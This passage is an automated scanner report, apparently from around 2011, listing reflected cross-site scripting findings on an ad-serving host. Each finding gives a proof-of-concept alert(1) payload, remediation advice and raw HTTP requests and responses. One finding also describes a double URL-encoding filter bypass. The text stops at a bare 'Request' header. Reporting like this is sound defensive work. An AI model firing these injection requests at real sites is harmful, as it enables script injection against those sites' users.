HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:50:41 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:50:41 GMT; path=/ Set-Cookie: i_1=33:1411:992:100:0:38345:1296399041:L|33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2; expires=Tue, 01-Mar-2011 14:50:41 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 913
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980bdd79'-alert(1)-'0f43dad1fc1'; var iRM = new Image(); iRM.src = 'http://redcated/action/Scottrade_Remessaging'; return true; } function wsod_image() { document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7f ...[SNIP]...
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35aab'-alert(1)-'33a2db030cc was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balert1_@2F_@2F2badde9cef5?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD35aab'-alert(1)-'33a2db030cc&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:50:33 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:50:33 GMT; path=/ Set-Cookie: i_1=33:1411:790:100:0:38345:1296399033:L|33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2; expires=Tue, 01-Mar-2011 14:50:33 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 917
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD35aab'-alert(1)-'33a2db030cc&ASID=c0c03864f93b446ea43c1039d6665980'; var iRM = new Image(); iRM.src = 'http://redcated/action/Scottrade_Remessaging'; return true; } function wsod_image() { document.write('<a href ...[SNIP]...
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98cf7'-alert(1)-'528bcea4702 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balert1_@2F_@2F2badde9cef5?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=823120898cf7'-alert(1)-'528bcea4702&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:50:14 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:50:14 GMT; path=/ Set-Cookie: i_1=33:1411:992:100:0:38345:1296399014:L|33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2; expires=Tue, 01-Mar-2011 14:50:14 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 913
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=823120898cf7'-alert(1)-'528bcea4702&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980'; var iRM = new Image(); iRM.src = 'http://redcated/action/Scottrade_Remessaging'; return true; } function wsod_image() {
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a704d'-alert(1)-'e0d47f974c4 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balert1_@2F_@2F2badde9cef5?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=Ga704d'-alert(1)-'e0d47f974c4&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:49:49 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:49:49 GMT; path=/ Set-Cookie: i_1=33:1411:46:100:0:38345:1296398989:L|33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2; expires=Tue, 01-Mar-2011 14:49:49 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 921
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=Ga704d'-alert(1)-'e0d47f974c4&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980'; var iRM = new Image(); iRM.src = 'http://redcated/action/Scottrade_Remessaging'; return true; } function ...[SNIP]...
5.86. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449** [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95a1b'-alert(1)-'677433aee2f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balert1_@2F_@2F2badde9cef5?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980&95a1b'-alert(1)-'677433aee2f=1 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:51:33 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:51:33 GMT; path=/ Set-Cookie: i_1=33:1411:793:100:0:38345:1296399093:L|33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2; expires=Tue, 01-Mar-2011 14:51:33 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 920
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980&95a1b'-alert(1)-'677433aee2f=1'; var iRM = new Image(); iRM.src = 'http://redcated/action/Scottrade_Remessaging'; return true; } function wsod_image() { document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d ...[SNIP]...
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11fba"-alert(1)-"faae54f86dc was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=801523511fba"-alert(1)-"faae54f86dc&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:49:20 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f424"-alert(1)-"73f0b6789de was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=17989824732f424"-alert(1)-"73f0b6789de&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:50:17 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45b7f"-alert(1)-"150a6e34d9c was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d666598045b7f"-alert(1)-"150a6e34d9c HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:50:35 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28a9b"-alert(1)-"18d2c882ce5 was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD28a9b"-alert(1)-"18d2c882ce5&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:50:25 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5282%2522%253balert%25281%2529%252f%252f3ec5efad5b4 was submitted in the REST URL parameter 2. This input was echoed as f5282";alert(1)//3ec5efad5b4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357f5282%2522%253balert%25281%2529%252f%252f3ec5efad5b4/1411.0.js.120x60/1798982473?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:51:27 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db472%2522%253balert%25281%2529%252f%252fcf9a3b974a6 was submitted in the REST URL parameter 3. This input was echoed as db472";alert(1)//cf9a3b974a6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60db472%2522%253balert%25281%2529%252f%252fcf9a3b974a6/1798982473?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:51:33 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cda5b"-alert(1)-"73a9c13756 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208cda5b"-alert(1)-"73a9c13756&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:50:02 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1680
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e406"-alert(1)-"7d0f2844801 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G2e406"-alert(1)-"7d0f2844801&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:49:43 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 974be"-alert(1)-"a93d2815993 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
